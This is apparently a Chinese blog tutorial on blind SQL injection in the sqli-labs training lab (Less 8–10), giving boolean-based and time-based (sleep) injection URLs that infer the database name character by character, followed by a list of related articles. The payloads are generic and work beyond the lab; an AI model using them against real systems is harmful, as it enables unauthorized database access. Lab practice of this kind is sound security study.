小课堂 -- 时间​​盲注和Bool盲注

简介: 小课堂 -- 时间​​盲注和Bool盲注

环境sqli-labs

 

less 8

一、通过判断是单引号闭合

http://192.168.1.119/sqli/Less-8/?id=1' --+

二、我们查询一下数据库有多少字节

http://192.168.1.119/sqli/Less-8/?id=1' and LENGTH(database())>=8 --+

三、判断数据库的第一个和第二个字母是s、e(ascii码是115,101)

http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))>=115 --+

http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),2,1))>=101 --+

 

Less 9

因为不管我们怎么输入,返回的都是同样的信息,但是我们又想知道是否存在注入,我们通过sleep(5)延时来判断是否成功执行了sql语句

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

 

Less 10

同上,只是由单引号变为双引号

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-10/?id=1” and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

 

禁止非法,后果自负

目录
相关文章
|
6月前
|
数据库
15、延时布尔盲注(Post)
15、延时布尔盲注(Post)
46 0
|
6月前
|
数据库
基于时间盲注
基于时间盲注
46 2
|
6月前
|
数据库
小课堂 -- 延时布尔盲注(Post)
小课堂 -- 延时布尔盲注(Post)
40 0
|
6月前
|
SQL 前端开发 Java
SQL注入天书笔记(1)布尔盲注
SQL注入天书笔记(1)布尔盲注
81 0
|
XML SQL 安全
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin (xpath盲注)
154 0
|
存储 数据库
laravel-admin 查询过滤时间戳(数据库使用int类型)不起作用案例复现及解决办法
laravel-admin 查询过滤时间戳(数据库使用int类型)不起作用案例复现及解决办法
278 0
laravel-admin 查询过滤时间戳(数据库使用int类型)不起作用案例复现及解决办法
|
小程序 编译器 C++
C++菜鸟学习笔记系列(19)——返回类型和return语句
C++菜鸟学习笔记系列(19)——返回类型和return语句
241 0
【工具】基于时间和布尔的注入原理与sqlmap的使用
进阶一下,我们看看盲注是如何操作的·。
142 0
Python3中判断为False的值集锦(持续更新ing...)
Python3中判断为False的值集锦(持续更新ing...)
|
关系型数据库 MySQL 索引
带你学MySQL系列 | 奇怪的null值,我该怎么办?看看我给你的总结!
带你学MySQL系列 | 奇怪的null值,我该怎么办?看看我给你的总结!
带你学MySQL系列 | 奇怪的null值,我该怎么办?看看我给你的总结!